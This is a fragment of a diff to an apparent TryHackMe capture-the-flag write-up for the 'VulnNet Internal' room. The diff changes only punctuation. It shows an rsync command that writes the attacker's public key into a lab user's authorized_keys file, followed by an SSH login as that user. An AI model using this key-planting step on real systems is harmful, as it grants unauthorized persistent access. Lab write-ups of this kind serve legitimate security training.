nisforrnicholas/nisforrnicholas.github.io/tryhackme/_posts/2021-11-24-vulnnet_internal.md

 rsync -av ~/.ssh/id_rsa.pub rsync://rsync-connect@10.10.102.151/files/sys-internal/.ssh/authorized_keys
 ```

-Once this is done, we can log into the **sys-internal** user's account using our private key.
+Once this is done, we can log into the **sys-internal** user's account using our private key:

 ```
 ssh sys-internal@10.10.102.151